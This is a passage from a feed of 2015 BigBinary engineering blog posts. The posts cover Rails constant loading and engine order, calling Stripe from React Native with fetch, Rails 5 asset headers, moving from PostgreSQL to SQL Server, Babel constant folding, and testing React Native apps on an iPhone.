<code>load</code> and <code>require</code> differ.</p><h2>Using 'require_relative' in model</h2><p>Another approach of solving this issue is by using <code>require_relative</code> inside model. <code>require_relative</code> loads the filepresent in the path that is relative to the file where the statement is called in. The desired file to be loaded is givenas an argument to <code>require_relative</code></p><p>In our example, to have <code>User.lib_method</code> successfully executed, we need to load the <code>lib/user.rb</code>. Adding the following codein the beginning of the model file <code>user.rb</code> should solve the problem. This is how <code>app/models/user.rb</code> will now look like.</p><pre><code class="language-ruby">require_relative '../../lib/user'class User  def self.model_method    'I am in models directory'  endend</code></pre><p>Here <code>require_relative</code> upon getting executed will first initialize the constant <code>User</code> from lib directory.What follows next is opening of the same class <code>User</code> that has been initialized already and addition of <code>model_method</code> to it.</p><h2>Handling priorities between Engine and App</h2><p>In one of the projects we are using <a href="http://guides.rubyonrails.org/engines.html">engines</a>.<code>SaleEngine</code> has a model <code>Sale</code>. However <code>Sale</code> doesn't get resolved aspath for engine is neither present in <code>config.autoload_paths</code> nor in <code>ActiveSupport::Dependencies.autoload_paths</code>.The initialization of engine happens in <code>engine.rb</code> file present inside <code>lib</code> directory of the engine.Let's add a line to load <code>engine.rb</code> inside <code>application.rb</code> file.</p><pre><code class="language-ruby">require_relative &quot;../sale_engine/lib/sale_engine/engine.rb&quot;</code></pre><p>In Rails console if we try to see autoload path then we will see that<code>lib/sale_engine</code> is present there. That means we can now use<code>SaleEngine::Engine</code>.</p><p>Now any file we add in <code>sale_engine</code> directory would be loaded. Howeverif we add <code>user.rb</code> here then the <code>user.rb</code> mentioned in <code>app/models</code>would be loaded first because the application directories haveprecedence. The precedence order can be changed by following statements.</p><pre><code class="language-ruby">engines = [SaleEngine::Engine] # in case there are multiple enginesconfig.railties_order = engines + [:main_app]</code></pre><p>The symbol <code>:main_app</code> refers to the application where the server comes up. After adding the above code, you will see thatthe output of <code>ActiveSupport::Dependencies</code> now shows the directories of engines first (in the order in which they have beengiven) and then those of the application. Hence for any class which is common between your app and engine, the one fromengine will now start getting resolved. You can experiment by adding multiple engines and changing the <code>railties_order</code>.</p><h2>Further reading</h2><p>Loading of constants is a big topic and <a href="https://twitter.com/fxn">Xavier Noria</a> from Rails core team has made some excellent presentations. Here are some of them</p><ul><li><a href="https://www.youtube.com/watch?v=8lYR9WxIRH0">Constant Autoloading in Ruby on Rails</a> Baruco 2013</li><li><a href="https://www.youtube.com/watch?v=wCyTRdtKm98">Constants in Ruby</a> RuLu 2012</li><li><a href="https://www.youtube.com/watch?v=4sIU8PxJEEk">Class Reloading in Ruby on Rails</a> RailsConf 2014</li></ul><p>We have also made a video on <a href="https://bigbinary.com/videos/learn-ruby-on-rails/how-autoloading-works-in-rails">How autoloading works in Rails</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Stripe API in React Native with fetch]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/using-stripe-api-in-react-native-with-fetch"/>
      <updated>2015-11-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-stripe-api-in-react-native-with-fetch</id>
      <content type="html"><![CDATA[<p><a href="https://stripe.com">Stripe</a> makes it easy to accept payments online. Stripeoffers an <a href="https://www.npmjs.com/package/stripe">npm package</a> with<a href="https://stripe.com/docs/api/node">nice documentation</a>.</p><h2>Problem with using Stripe in React Native</h2><p>I added stripe to my React Native application using following command.</p><pre><code class="language-plaintext">npm install stripe --save</code></pre><p>Added Stripe to the project as shown below.</p><pre><code class="language-plaintext">var stripe = require('stripe')('stripe API key');</code></pre><p>And now I'm getting following error.</p><p><img src="/blog_images/2015/using-stripe-api-in-react-native-with-fetch/http_error_in_react_native.png" alt="could not mount"></p><p>This's because npm package uses <a href="https://stripe.com/docs/stripe.js">stripe.js</a>and stripe.js needs <a href="https://nodejs.org/api/http.html">http</a> provided byNode.JS.</p><p>Our React Native code does not actually run on Node.JS. I know while buildingReact Native we use NPM and we have a node server running in the background soit feels like we are in Node.JS land and we can use everything Node.JS has tooffer. But that's not true. React Native code can't depend on Node.JS becauseNode.JS is not shipped with ios. It means we can't use any of Node.JS packagesincluding <code>http</code>. It means we can't use <code>stripe</code> npm module.</p><p>Now you can remove <code>require('stripe')</code> line that was added in the last step.</p><h2>Solution</h2><p>React Native comes with <a href="https://fetch.spec.whatwg.org">Fetch</a><a href="https://github.com/github/fetch">api</a>. From the documentation</p><blockquote><p>The Fetch API provides a JavaScript interface for accessing an manipulatingparts of the HTTP pipeline, such as requests and responses. It also provides aglobal fetch() method that provides an easy, logical way to fetch resourcesasynchronously across the network.</p></blockquote><p>stripe.js is a nice wrapper around stripe api. stripe api is very welldocumented and is easy to use. Since we can't use stripe.js we will use stripeapi.</p><p>We will use fetch to<a href="https://stripe.com/docs/api#create_card_token">create a credit card token using api</a>.</p><pre><code class="language-javascript">return fetch(&quot;https://api.stripe.com/v1/tokens&quot;, {  method: &quot;post&quot;,  headers: {    Accept: &quot;application/json&quot;,    &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,    Authorization: &quot;Bearer &quot; + &quot;&lt;YOUR-STRIPE-API-KEY&gt;&quot;,  },  body: formBody,});</code></pre><p>Here, the header has 3 keys. Lets go through them one-by-one:</p><ul><li><code>'Accept': 'application/json'</code> : Designates the content to be in JSON format.</li><li><code>'Content-Type': 'application/x-www-form-urlencoded'</code> : This tells theendpoint that the payload will be one giant query string where name and valuepairs will be separated by the ampersand.</li><li><code>'Authorization': 'Bearer ' + '&lt;YOUR-STRIPE-API-KEY&gt;'</code> : This key is toauthorize our actions on Stripe. Here <code>Bearer</code> is just a prefix which we needto attach to the api-key because Stripe uses OAuth 2.0 . You can read more onthe Bearer token usage<a href="http://self-issued.info/docs/draft-ietf-oauth-v2-bearer.html">here</a> .</li></ul><p>Payload needs to contain credit card details.</p><pre><code class="language-javascript">var cardDetails = {  &quot;card[number]&quot;: &quot;1111 2222 3333 4444&quot;,  &quot;card[exp_month]&quot;: &quot;01&quot;,  &quot;card[exp_year]&quot;: &quot;2020&quot;,  &quot;card[cvc]&quot;: &quot;123&quot;,};</code></pre><p>Since the <code>Content-Type</code> is <code>application/x-www-form-urlencoded</code>, the payloadshould be one query string. An example of this would be:<code>city=Miami&amp;state=Florida</code></p><p>Let's prepare a proper payload.</p><pre><code class="language-plaintext">var formBody = [];for (var property in cardDetails) {  var encodedKey = encodeURIComponent(property);  var encodedValue = encodeURIComponent(cardDetails[property]);  formBody.push(encodedKey + &quot;=&quot; + encodedValue);}formBody = formBody.join(&quot;&amp;&quot;);</code></pre><p>That's it. Now we can attach <code>formBody</code> to the body part of the fetch requestand we are good to go.</p><h2>Final solution</h2><p>Here's the whole code snippet.</p><pre><code class="language-javascript">&quot;use strict&quot;;var stripe_url = &quot;https://api.stripe.com/v1/&quot;;var secret_key = &quot;&lt;YOUR-STRIPE-API-KEY&gt;&quot;;module.exports.createCardToken = function (cardNumber, expMonth, expYear, cvc) {  var cardDetails = {    &quot;card[number]&quot;: cardNumber,    &quot;card[exp_month]&quot;: expMonth,    &quot;card[exp_year]&quot;: expYear,    &quot;card[cvc]&quot;: cvc,  };  var formBody = [];  for (var property in cardDetails) {    var encodedKey = encodeURIComponent(property);    var encodedValue = encodeURIComponent(cardDetails[property]);    formBody.push(encodedKey + &quot;=&quot; + encodedValue);  }  formBody = formBody.join(&quot;&amp;&quot;);  return fetch(stripe_url + &quot;tokens&quot;, {    method: &quot;post&quot;,    headers: {      Accept: &quot;application/json&quot;,      &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,      Authorization: &quot;Bearer &quot; + secret_key,    },    body: formBody,  });};</code></pre><p>This is an example of registering a credit card with stripe and getting thetoken. Similar implementations can be done for other API endpoints.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 allows setting custom HTTP Headers for assets]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-setting-custom-http-headers-for-assets"/>
      <updated>2015-10-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-setting-custom-http-headers-for-assets</id>
      <content type="html"><![CDATA[<p>Let's look at by default what kind of response headers we get when we start witha brand new Rails 4.2.4 application.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/header1.png" alt="header"></p><p>Now let's say that I want to set a custom response header. That's easy. All Ineed to do is add following line of code in the controller.</p><pre><code class="language-plaintext">response.headers['X-Tracking-ID'] = '123456'</code></pre><p>Now I see this custom response header.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/header2.png" alt="header"></p><h2>Setting custom response header for assets</h2><p>Let's say that I need that custom response header not only for standard webrequests but also for my assets. For example <code>application.js</code> file is served byRails in localhost. How would I set custom header to the asset being served byRails here.</p><p>Actually that's not possible in Rails 4. In Rails 4 we can set only one responseheader for assets that are served by Rails and that response header is<code>Cache-Control</code>.</p><p>Here is how I can configure <code>Cache-Control</code> for assets.</p><pre><code class="language-plaintext"># open config/environments/production.rb and add following lineconfig.static_cache_control = 'public, max-age=1000'</code></pre><p>Now we have modified 'Cache-Control` header for the assets.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/header3.png" alt="header"></p><p>Besides <code>Cache-Control</code> no other response header can be set for assets served byRails. That's a limitation.</p><h2>How Rails Apps lived with this limitation so far</h2><p>Rails is not the best server to serve static assets. Apace and NGINX are muchbetter at this job. Hence ,in reality, in production almost everyone puts eitherApache or NGINX in front of a Rails server and in this way Rails does not haveto serve static files.</p><p>Having said that, Rails applications hosted at Heroku is an exception. Assetsfor Rails applications running at Heroku are served by Rails application itself.</p><h3>Problem we ran into</h3><p>Our <a href="https://bigbinary.com">website</a> is hosted at heroku. When we ran<a href="https://developers.google.com/speed/pagespeed/insights/">Google page speed insights</a>for our website we were warned that we were not using <code>Expires</code> header for theassets.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/PageSpeedInsightsWarnings.png" alt="PageSpeed Insights Warning"></p><p>Here are how the header looked for <code>application.js</code>.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/bigbinary_before_expires.png" alt="PageSpeed Insights Warning"></p><p>Now you see the problem we are running into.</p><ul><li>Our application is hosted at Heroku.</li><li>Heroku lets Rails serve the assets.</li><li>Google page speed insights wants us to set <code>Expires</code> header to the assets.</li><li>Rails application allows only one header for the assets and that is'Cache-Control`.</li></ul><p>One easy solution is to host our website at<a href="https://www.digitalocean.com">Digital Ocean</a> and then use Apache or NGINX.</p><h2>Rails 5 saves the day</h2><p>Recently Rails<a href="https://github.com/rails/rails/pull/19135">merged basic support for access control headers</a>and added ability to define custom HTTP Headers on assets served by Rails.</p><p>Behind the scenes, Rails uses <code>ActionDispatch::Static</code> middleware to take careof serving assets. For example, a request to fetch an image, goes through<code>ActionDispatch::Static</code> in the request cycle. <code>ActionDispatch::Static</code> takescare of serving <code>Rack::File</code> object from server with appropriate headers set inthe response. The served image can have headers like <code>Content-Type</code>,<code>Cache-Control</code>.</p><h2>Start using Rails master</h2><p>To fix this, we first pointed the App to use Rails master.</p><pre><code class="language-ruby">gem 'rails', github: 'rails/rails'gem 'rack', github: 'rack/rack' # Rails depends on Rack 2gem 'arel', github: 'rails/arel' # Rails master works alongside of arel master.</code></pre><p>Next, we changed asset configuration to start providing and using missing headerfor <code>Expires</code>.</p><pre><code class="language-ruby"># production.rbconfig.public_file_server.headers = {  'Cache-Control' =&gt; 'public, s-maxage=31536000, max-age=15552000',  'Expires' =&gt; &quot;#{1.year.from_now.to_formatted_s(:rfc822)}&quot;}</code></pre><p>Here, we are first setting the <code>Cache-Control</code> header to use public(intermediate) caching, for a year (31536000 seconds) with <code>max-age</code> and<code>s-maxage</code>. Here <code>s-maxage</code> stands for <code>Surrogate</code> cache, which is used to cacheinternally by Fastly.</p><p>We then provide the missing <code>Expires</code> value with some future date in Internetformatted time value.</p><p>With this setup, we can see PageSpeed pickups the new headers on assets and doesnot warn us for the missing header.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/PageSpeedInsightsSolved.png" alt="PageSpeed Insights Warning"></p><p>Here is the changed response header for asset.</p><p><img src="/blog_images/2015/rails-5-allows-setting-custom-http-headers-for-assets/bigbinary_after_expires.png" alt="PageSpeed Insights Warning"></p><h2>Further Reading</h2><p>For better use and more details about different headers to use for the assets,please refer to<a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html">RFC 2616</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Migrating Rails app from postgresql to sql server]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-from-postgresql-to-sqlserver"/>
      <updated>2015-10-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-from-postgresql-to-sqlserver</id>
      <content type="html"><![CDATA[<p>We started development on a project with<a href="http://www.postgresql.org">PostgreSQL</a>as our database.However midway we had to switch to<a href="http://www.microsoft.com/en-us/server-cloud/products/sql-server/">SQL Server</a>for avariety of reasons.</p><p>Here are some of the issues we noticed while migrating to SQL Server.</p><h2>Unique constraint on a column which has multiple NULL values</h2><p>As per the ANSI SQL standard unique constraint should allow multiple NULL values.</p><p>PostgreSQL documentation on unique constraint states following.</p><pre><code class="language-ruby">In general, a unique constraint is violated when there is more than one row inthe table where the values of all of the columns included in the constraint areequal.However, two null values are not considered equal in this comparison.That means even in the presence of a unique constraint it is possible to storeduplicate rows that contain a null value in at least one of the constrainedcolumns.This behavior conforms to the SQL standard, but we have heard thatother SQL databases might not follow this rule. So be careful when developingapplications that are intended to be portable.</code></pre><p>In SQL Server a unique constraint does <strong>not</strong> allow multiple NULL values.</p><p><a href="https://github.com/plataformatec/devise">Devise</a> by default adds unique index on <code>reset_password_token</code> column.</p><pre><code class="language-ruby">add_index :users, :reset_password_token, :unique =&gt; true</code></pre><p><code>Devise</code> is doing the right thing by enforcing a unique index on<code>reset_password_token</code> so that when a user clicks on a link to resetpassword the application would know who the user is.</p><p>However here is the problem. If we add a new user then by default thevalue of <code>reset_password_token</code> is <code>NULL</code>. If we add another user then wehave two records with <code>NULL</code> value in <code>reset_password_token</code>. This worksin PostgreSQL.</p><p>But SQL Server would not allow to have two records with <code>NULL</code> in<code>reset_password_token</code> column.</p><p>So how do we solve this problem.</p><p><a href="https://en.wikipedia.org/wiki/Partial_index">Partial index</a> to rescue.It is also known as <code>Filtered index</code>.Both <a href="http://www.postgresql.org/docs/8.0/static/indexes-partial.html">PostgreSQL</a>and<a href="https://msdn.microsoft.com/en-us/library/cc280372.aspx">SQL server</a> support it.Rails also supports <code>partial index</code> by allowing us to pass <code>where</code>option as shown below.</p><pre><code class="language-ruby">add_index :users, :reset_password_token,                  unique: true,                  where: 'reset_password_token IS NOT NULL'</code></pre><p>Please <a href="https://github.com/rails-sqlserver/activerecord-sqlserver-adapter/issues/153">visit this issue</a>if you want to see detailed discussion on this topic.</p><p>This behavior of SQL Server comes in play in various forms.Let's say that we are adding <code>api_auth_token</code> to an existing userstable.</p><p>Typically a migration for that might look like as shown below.</p><pre><code class="language-ruby">add_column :users, :api_auth_token, :string,                                    :null =&gt; true,                                    :unique =&gt; true</code></pre><p>In this case we have plenty of records in the <code>users</code> table so the abovemigration will fail in PostgreSQL. We will have to resort to usageof <code>partial index</code> to fix this issue.</p><h2>Adding not null constraint on a column with an index</h2><p>In PostgreSQL following case will work just fine.</p><pre><code class="language-ruby">add_column :users, :email, :string, :unique =&gt; truechange_column :users, :email, :null =&gt; false</code></pre><p>Above migration will fail with SQL Server.</p><p>In SQL Servera &quot;not null constraint&quot; <a href="https://msdn.microsoft.com/en-us/library/ms190273.aspx">cannot be added</a>on a column which has a index onit.We need to first remove the unique index, then add the &quot;not null&quot; constraint and then add the unique index back.</p><p>The other solution is to add <code>not NULL</code> constraint first in themigration and then add any index.</p><h2>Serialize array into a string column</h2><p>ActiveRecord <a href="http://edgeguides.rubyonrails.org/active_record_postgresql.html#array">supports Array Datatype</a>for PostgreSQL. We were using this feature to store a list of IDs.</p><p>After switching to SQL server we converted the column into string typeand serialized the array.</p><pre><code class="language-ruby">serialize :user_ids, Array</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring Pycharm IDE to run a Robot Framework test]]></title>
       <author><name>Prabhakar Battula</name></author>
      <link href="https://www.bigbinary.com/blog/configuring-pycharm-to-run-tests"/>
      <updated>2015-10-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/configuring-pycharm-to-run-tests</id>
      <content type="html"><![CDATA[<p><a href="https://www.jetbrains.com/pycharm">Pycharm</a> is a convenient IDE to work with<a href="http://robotframework.org">Robot framework</a>. To run a test suite or a testscript, one can do so only through console. Running tests through console isvery demanding. If user can run tests from Pycharm itself then that helpsimprove productivity. This blog explains how to configure Pycharm to be able torun test suite or a single test from the IDE itself.</p><h2>Configuration to run a single test script</h2><p><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p1.png" alt="pycharm robot 1"><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p2.png" alt="pycharm robot 2"><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p3.png" alt="pycharm robot 3"></p><p>Running a single test script</p><p><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p4.png" alt="pycharm robot 4"></p><h2>Configuration to run a particular test suite</h2><p><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p5.png" alt="pycharm robot 5"></p><p>Running a particular test suite</p><p><img src="/blog_images/2015/configuring-pycharm-to-run-tests/p6.png" alt="pycharm robot 6"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Optimize JavaScript code using BabelJS]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/code-optimize-javascript-code-using-babeljs"/>
      <updated>2015-08-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/code-optimize-javascript-code-using-babeljs</id>
      <content type="html"><![CDATA[<p>Though <a href="http://babeljs.io/">Babel</a> is a transpiler to convert ESNext code to ES5,it can be used to optimize the code as well.</p><p>Let's say we want to convert following ES6 code using Babel.</p><pre><code class="language-javascript">let a = 10;let b = 42;if (a &lt; b) {  console.log(&quot;a is less than b&quot;);} else {  console.log(&quot;b is less than a&quot;);}</code></pre><p>It will get translated to:</p><pre><code class="language-javascript">&quot;use strict&quot;;var a = 10;var b = 42;if (a &lt; b) {  console.log(&quot;a is less than b&quot;);} else {  console.log(&quot;b is less than a&quot;);}</code></pre><p>All good so far.Let's try Babel'sconstant folding plugin (Link is not available).I am compiling the ES6 code from command line this time.</p><pre><code class="language-bash">babel --plugins constant-folding index.js --out-file bundle.js -w</code></pre><p>This gives us following output:</p><pre><code class="language-javascript">&quot;use strict&quot;;var a = 10;var b = 42;if (true) {  console.log(&quot;a is less than b&quot;);} else {  console.log(&quot;b is less than a&quot;);}</code></pre><p>If condition changed from <code>(a &lt; b)</code> to <code>(true)</code>.The <code>constant-folding</code> plugin has smartly evaluated the conditional expression <code>a &lt; b</code> andreplaced the code with the result of that expression.</p><p>This plugin can also optimize other expressions as shown below.</p><pre><code class="language-javascript">// Unary operatorsconsole.log(!true);// Binary expressionconsole.log(20 + 22);// Function callsconsole.log(Math.min(91, 2 + 20));</code></pre><p>Which gets optimized to:</p><pre><code class="language-javascript">// Unary operatorsconsole.log(false);// Binary expressionconsole.log(42);// Function callsconsole.log(22);</code></pre><h2>How does this actually work?</h2><p>Though we are using a &quot;constant folding plugin&quot;to achieve this optimization, the real work happens in Babel itself.</p><p>For every expression in the code, the constant folding plugin calls <code>evaluate</code> function from Babel source code.This function checks whether it can <em>confidently</em> find end value for a given expression.</p><p>The <code>evaluate</code> function returns <strong>confidence level</strong> and <strong>end value</strong> for any given expression. Based on this &quot;confidence level&quot;, constant folding plugin replaces the expression with their end values altering our original code as follows.</p><h2>How evaluate handles different cases</h2><p>For code <code>Math.min(10, 20)</code>, evaluate will return</p><p><code>{ confident: true, value: 10 }</code></p><p>For code <code>a &lt; b</code>, evaluate will return</p><p><code>{ confident: true, value: true }</code>.</p><p>But for user defined function like <code>foo('bar')</code> or browser defined <code>console.log('hello')</code>, evaluate will return</p><p><code>{ confident: false, value: undefined }</code>.</p><p>In the above case &quot;confident&quot; value will be &quot;false&quot; even if function returns a constant value. For examplefor code <code>foo(100)</code>, evaluate will return</p><p><code>{ confident: false, value: undefined }</code>.</p><p>In the above case function <code>foo</code> will always return <code>100</code>. Still Babel has low confidence level. Why? That's becauseBabel sees that it is a function and it bails out. It does not even look inside to try to figure things out.</p><p><a href="https://github.com/babel/babel/blob/e2b39084a4a48c48ff3441aab35b22d9efc3c8d6/packages/babel/src/traversal/path/evaluation.js#L43">Here is</a>evaluate code in Babel. You should check it out.</p><h2>How much optimization is possible?</h2><p>How much help we will get from Babel for optimizing our code? Will it optimize everything?</p><p>The answer is unfortunately no.</p><p>As of now, Babel optimizes logical, binary, conditional expressions. It can also evaluate function calls on literals like <code>&quot;babel&quot;.length</code> confidently if the literal is string or number.</p><p>For function calls, it supports only certain <a href="https://github.com/babel/babel/blob/master/packages/babel/src/traversal/path/evaluation.js#L3">callees</a> like <code>String</code>, <code>Number</code> and <code>Math</code>. So call to a user defined function, even if it's returning a fixed value, will not be optimized.</p><h2>Experimental feature</h2><p>This feature looks great. But it's available as <strong>experimental</strong> feature.If you use the plugin you will getfollowing warning. unless you enable <code>experimental</code> flag.</p><pre><code class="language-plaintext">$ babel --plugins constant-folding index.js --out-file bundle.js -w[BABEL] index.js: THE TRANSFORMER constant-folding HAS BEEN MARKED AS EXPERIMENTAL AND IS WIP. USE AT YOUR OWN RISK. THIS WILL HIGHLY LIKELY BREAK YOUR CODE SO USE WITH **EXTREME** CAUTION. ENABLE THE `experimental` OPTION TO IGNORE THIS WARNING.</code></pre><p>In order to get rid of warning you need to pass <code>--experimental</code> flaglike this.</p><pre><code class="language-plaintext">$ babel --plugins constant-folding index.js --out-file bundle.js -w--experimental</code></pre><h2>Eliminating dead code</h2><p>In above code example, we know that the result of <code>if (a &lt; b)</code> is <code>true</code> based on values of a and b.Since the result is not going to change no matter whatthere is no needto have the <code>if</code> and <code>else</code> clauses.</p><p>That's <em>dead code</em>.</p><p>Can Babel help us eliminate dead code?</p><p>Yes with the help of <code>minification.deadCodeElimination</code> option.</p><pre><code class="language-bash">babel --optional minification.deadCodeElimination index.js --out-file bundle.js -w</code></pre><p>Which converts earlier code to:</p><pre><code class="language-javascript">&quot;use strict&quot;;console.log(&quot;a is less than b&quot;);</code></pre><p>I will talk about how Babel can eliminate dead code in a later post.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to test React Native App on a real iPhone]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-test-react-native-app-on-real-iphone"/>
      <updated>2015-08-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-test-react-native-app-on-real-iphone</id>
      <content type="html"><![CDATA[<p>I have been developing a new iOS app using<a href="https://facebook.github.io/react-native/">React Native</a>. I have been testing itusing simulator provided by Xcode. Now it's time to test the app using a realdevice. One could ask why test on a real device if it works perfectly on asimulator. Here are some of the reasons.</p><ul><li>There are a number of device specific features which are not testable on asimulator. Phone calls, camera, gps data, compass and vibration are a few ofthem.</li><li>Testing unexpected cases that can only be tested on a real device. Like howyour application handles incoming calls, low memory situations, low diskspace, limited data connectivity etc.</li><li>Hardware-wise, your device is different than your Mac. If your app is graphicsintensive and requires a lot of CPU usage, it might work seamlessly on yoursimulator depending on your Mac's specifications. But it might be laggy andglitchy on the real device.</li></ul><p>Now let's look into how you can start testing your React Native app on an realiPhone.</p><h2>Step 1 - Plug in your device</h2><p>Plug in your device to your Mac and open Xcode. You will be able to select yourdevice to the right of the Play and Stop buttons.</p><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/select-device.png" alt="select device"></p><p>You might run into one of the following two errors if you have not enrolled intoApple's Developer Program.</p><h2>Error 1 : Failed to code sign</h2><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/xcode-error1.png" alt="xcode error 1"></p><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/xcode-error2.png" alt="xcode error 2"></p><p>To fix above issues please enroll in Apple Developer program.</p><h2>Error 2 : Disk Image could not be mounted</h2><pre><code class="language-plaintext">The Developer Disk Image could not be mounted :You may be running a version of iOS that is not supported by this version of XCode</code></pre><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/could-not-mount.png" alt="could not mount"></p><p>This can happen if your iOS version is not supported by your current version ofXcode. To fix this, just update your Xcode to the latest version from the AppStore.</p><h2>Step 2 - Set right deployment target</h2><p>In your Xcode project setup the <code>Deployment Target</code> should be set to less thanor equal to the iOS version installed on the device.</p><p>If your iPhone is running iOS 7.0 and you have set &quot;Deployment Target&quot; as 8.0then the app <strong>will not</strong> work. If your iPhone is running iOS 8.0 and you haveset &quot;Deployment Target&quot; as 7.0 then the app <strong>will</strong> work.</p><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/deployment-target.png" alt="deployment target"></p><h2>Step 3 - Fix &quot;Could not connect to development server&quot; error</h2><p>So the app is installed and you can see the launch screen. That's great. Butsoon you might get following error on your iPhone.</p><pre><code class="language-plaintext">Could not connect to development server.Ensure node server is running and available on the samenetwork  run npm start from react-native root.</code></pre><p><img src="/blog_images/2015/how-to-test-react-native-app-on-real-iphone/connection-error.PNG" alt="connection error"></p><p>To fix this open <code>AppDelegate.m</code> file in your project's iOS folder.</p><p>Locate line mentioned below and replace <code>localhost</code> with your Mac IP addresse.g. <code>192.168.x.x</code>.</p><p>To find the ip address of your Mac this is what ReactNative suggests us to do.</p><blockquote><p>you can get ip by typing <code>ifconfig</code> into the terminal and selecting the * &gt;<code>inet</code> value under <code>en0:</code>.</p></blockquote><pre><code class="language-objectivec">jsCodeLocation = [NSURL URLWithString:@&quot;http://localhost:8081/index.ios.bundle&quot;];</code></pre><p>Save and click run again. This will fix the error.</p><h2>Step 3 - Fix connecting to API hosted on local development server</h2><p>Now the app is installed and you can navigate through the app screens. If theapp attempts to make API call to the server running locally on the machine thendepending on how the local server was started it could be a problem.</p><p>In my case, I have a Ruby on Rails application running on my local machine. Ihad started my rails server by executing command <code>rails server</code>.</p><p>To do this, the app should be able to access the rails server using the privateip of the server e.g. <code>192.168.x.x:3000</code>. Turned out that I had started my railsserver using command <code>rails server</code>.</p><p>Because of<a href="http://guides.rubyonrails.org/4_2_release_notes.html#default-host-for-rails-server">change in Rails 4.2</a>rails server listens to <code>localhost</code> and not <code>0.0.0.0</code>.</p><p>The rails guide further says following.</p><blockquote><p>with this change you will no longer be able to access the Rails server from adifferent machine, for example if your development environment is in a virtualmachine and you would like to access it from the host machine. In such cases,please start the server with rails server -b 0.0.0.0 to restore the oldbehavior.</p></blockquote><p>In this case iPhone is trying to talk to Rails server so Rails server must bestarted using following command.</p><pre><code class="language-plaintext">rails server -b 0.0.0.0orrails server --binding=0.0.0.0</code></pre><p>By doing so, now you can connect to your Rails app from your local network, bybrowsing to <code>http://192.168.x.x:3000</code>.</p><h2>Summary</h2><p>These were some of the issues I came across while testing my iOS app on anactual device and how I fixed them. Hopefully, this blog post helps you fixthese error cases get you started on testing quickly.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using ReactJS with Rails Action Cable]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/using-reactjs-with-rails-actioncable"/>
      <updated>2015-07-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-reactjs-with-rails-actioncable</id>
      <content type="html"><![CDATA[<p>Recent DHH, announced availability of alpha version of Action Cable.</p><p>&lt;blockquote class=&quot;twitter-tweet&quot; data-cards=&quot;hidden&quot; lang=&quot;en&quot;&gt;&lt;p lang=&quot;en&quot; dir=&quot;ltr&quot;&gt;Action Cable v0.1.0 is now available for alpha testers: &lt;a href=&quot;https://t.co/ryqK2ZAKG7&quot;&gt;https://t.co/ryqK2ZAKG7&lt;/a&gt;. I'll be setting up a demo repo shortly as well. ENJOY!&lt;/p&gt; DHH (@dhh) &lt;a href=&quot;https://twitter.com/dhh/status/618886698009759748&quot;&gt;July 8, 2015&lt;/a&gt;&lt;/blockquote&gt;&lt;script async src=&quot;//platform.twitter.com/widgets.js&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;</p><p><a href="https://github.com/rails/actioncable">Action Cable</a> is still underheavy development but it comes with <a href="https://github.com/rails/actioncable-examples">examples</a>to demonstrate its usage.</p><p>Action Cable integrates websocket based real-time communication in Ruby on Rails applications.It allows building realtime applications like Chats, Status updates, etc.</p><h2>Action Cable + React</h2><p>Action Cable provides real time communication. ReactJS is a good tool tomanage view complexity on the client side. Together they make it easy todevelop snappy web applications which requires state management onthe client side without too much work.</p><p>Anytime data changes the new data is instantly provided by Action Cableand the new data is shown on the view without user doing anything on theapplication by ReactJS.</p><h2>Integrating React</h2><p>The official Action Cable Example is a chat application. We will bebuilding the same application using <a href="https://facebook.github.io/react">ReactJS</a>.</p><p>First follow the <a href="https://github.com/rails/actioncable-examples">instructions mentioned</a> to get a working chat application using Action Cable.</p><p>Now that the chat application is working let's get started with addingReactJS to the application.</p><p><em>Please note that we have also posted a number of<a href="https://bigbinary.com/videos">videos</a>on learningReactJS. Check them out if you are interested.</em></p><h2>Step 1 - Add required gems to Gemfile</h2><pre><code class="language-ruby"># react-rails isn't compatible yet with latest Sprockets.# https://github.com/reactjs/react-rails/pull/322gem 'react-rails', github: 'vipulnsward/react-rails', branch: 'sprockets-3-compat'# Add support to use es6 based on top of babel, instead of using coffeescriptgem 